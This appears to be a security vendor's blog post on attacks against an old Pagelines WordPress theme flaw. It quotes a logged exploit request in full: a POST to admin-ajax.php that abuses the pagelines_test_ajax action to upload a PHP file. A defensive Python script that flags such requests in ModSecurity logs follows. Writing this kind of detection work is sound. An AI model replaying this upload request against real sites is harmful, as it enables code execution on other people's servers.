Attacks on the Pagelines WordPress theme

PageLines

Over the last few days we have seen a large number of attacks against this old Pagelines WordPress theme vulnerability. Sucuri discovered the Pagelines vulnerability in January 2015.

Technical Details

Any website using a vulnerable version of the Platform theme (<1.4.4) is at risk of privilege escalation and remote code execution.

ModSecurity Audit log, Payload

[27/May/2017:02:32:09 +0300] WSi6@VQikyQAAErqcawAAAAg 93.170.77.90 37930 127.0.0.1 80
--5367c063-B--
POST /wp-admin/admin-ajax.php HTTP/1.1
User-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Connection: close, Te
Accept: */*
Te: trailers
Accept-language: en-US;q=0.8,en;q=0.6
Accept-encoding: gzip, deflate
Content-length: 398
Host: vsdysleksia.net
Content-type: multipart/form-data; boundary=xYzZY
Referer: https://malware.expert/

Here is the POST data:

--5367c063-C--
--xYzZY
Content-Disposition: form-data; name="page"

pagelines
--xYzZY
Content-Disposition: form-data; name="file"; filename="settings.php"
Content-Type: text/plain

< ?php echo '0ba4439ee9a46d9d9f14c60f88f45f87'; exit; ?>
--xYzZY
Content-Disposition: form-data; name="action"

pagelines_test_ajax
--xYzZY
Content-Disposition: form-data; name="settings_upload"

settings
--xYzZY--
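To show how an entry like the one above can be picked apart and flagged, here is an added example written for this post; it is not part of the Malware Expert ModSecurity rule set, nor Sucuri's or Pagelines' code. It splits a ModSecurity audit-log entry into its lettered sections, parses the multipart request body, and reports why the request looks like an attempt on the theme's settings-upload AJAX handler (`action=pagelines_test_ajax`, a `settings_upload` field, and a file part that is named `.php` or contains a PHP open tag). The two sample entries are constructed: an abridged copy of the log quoted above and a harmless heartbeat request for contrast. All function and field names are the example's own.

```python
"""Flag attempts on the Pagelines/Platform settings-upload AJAX handler in a
ModSecurity audit-log entry. Added example, not the Malware Expert rules."""
import re
from typing import Dict, List, Tuple

# Constructed sample: sections -B- (headers) and -C- (body) of the request
# quoted in the post, abridged to the headers the check needs (LF line ends).
SAMPLE_ATTACK = """--5367c063-B--
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: vsdysleksia.net
Content-type: multipart/form-data; boundary=xYzZY

--5367c063-C--
--xYzZY
Content-Disposition: form-data; name="page"

pagelines
--xYzZY
Content-Disposition: form-data; name="file"; filename="settings.php"
Content-Type: text/plain

< ?php echo '0ba4439ee9a46d9d9f14c60f88f45f87'; exit; ?>
--xYzZY
Content-Disposition: form-data; name="action"

pagelines_test_ajax
--xYzZY
Content-Disposition: form-data; name="settings_upload"

settings
--xYzZY--
"""

# Constructed sample: an ordinary WordPress heartbeat POST, for contrast.
SAMPLE_BENIGN = """--5367c063-B--
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: vsdysleksia.net
Content-type: multipart/form-data; boundary=xYzZY

--5367c063-C--
--xYzZY
Content-Disposition: form-data; name="action"

heartbeat
--xYzZY--
"""

SECTION_RE = re.compile(r"^--[0-9a-f]+-([A-Z])--$", re.M)   # --<txid>-<letter>--
VULN_ACTION = "pagelines_test_ajax"                         # handler abused above
# PHP open tag; whitespace after '<' is tolerated so the exact text copied
# from the log above ("< ?php") is still matched.
PHP_TAG_RE = re.compile(r"<\s*\?(?:php\b|=)", re.I)


def split_sections(entry: str) -> Dict[str, str]:
    """Map audit-log section letters (A, B, C, ...) to their text."""
    pieces = SECTION_RE.split(entry.replace("\r\n", "\n"))
    # pieces = [preamble, letter1, text1, letter2, text2, ...]
    return {pieces[i]: pieces[i + 1].strip("\n") for i in range(1, len(pieces) - 1, 2)}


def parse_request_headers(section_b: str) -> Tuple[str, str, Dict[str, str]]:
    """Return (method, path, headers) from the -B- section; headers lower-cased."""
    if not section_b:
        return "", "", {}
    lines = section_b.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    return method, path, headers


def parse_multipart(body: str, boundary: str) -> List[dict]:
    """Minimal multipart/form-data parser: one dict per part."""
    parts = []
    for chunk in body.split("--" + boundary):
        chunk = chunk.strip("\n")
        if chunk in ("", "--"):           # preamble or closing delimiter
            continue
        head, _sep, data = chunk.partition("\n\n")
        name = re.search(r'(?:^|;\s*)name="([^"]*)"', head)
        fname = re.search(r'filename="([^"]*)"', head)
        parts.append({"name": name.group(1) if name else None,
                      "filename": fname.group(1) if fname else None,
                      "data": data})
    return parts


def assess(entry: str) -> List[str]:
    """Reasons the entry looks like a Pagelines settings-upload attempt ([] if none)."""
    sections = split_sections(entry)
    _method, path, headers = parse_request_headers(sections.get("B", ""))
    boundary = re.search(r"boundary=([^;\s]+)", headers.get("content-type", ""))
    if not path.endswith("/wp-admin/admin-ajax.php") or not boundary:
        return []
    parts = parse_multipart(sections.get("C", ""), boundary.group(1))
    by_name = {p["name"]: p for p in parts}
    reasons = []
    if by_name.get("action", {}).get("data", "").strip() == VULN_ACTION:
        reasons.append("action:" + VULN_ACTION)
    if "settings_upload" in by_name:
        reasons.append("field:settings_upload")
    for p in parts:
        if p["filename"] and p["filename"].lower().endswith((".php", ".phtml")):
            reasons.append("filename:" + p["filename"])
        if p["filename"] and PHP_TAG_RE.search(p["data"]):
            reasons.append("content:" + p["filename"])
    return reasons


def is_exploit_attempt(entry: str) -> bool:
    """True when the vulnerable action is called together with a PHP upload."""
    reasons = assess(entry)
    return any(r.startswith("action:") for r in reasons) and \
        any(r.startswith(("filename:", "content:")) for r in reasons)


if __name__ == "__main__":
    for label, sample in (("attack", SAMPLE_ATTACK), ("benign", SAMPLE_BENIGN)):
        print(label, is_exploit_attempt(sample), assess(sample))
```

Run on the sample above the attack entry reports all four reasons, while the heartbeat request reports none. The file check is deliberately based on the part's `filename` and content rather than its declared `Content-Type` (the request above labels the PHP upload as `text/plain`), which is the detail a rule writer would want to keep in mind.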

Final words

Websites using the Malware Expert ModSecurity rules are protected against this vulnerability.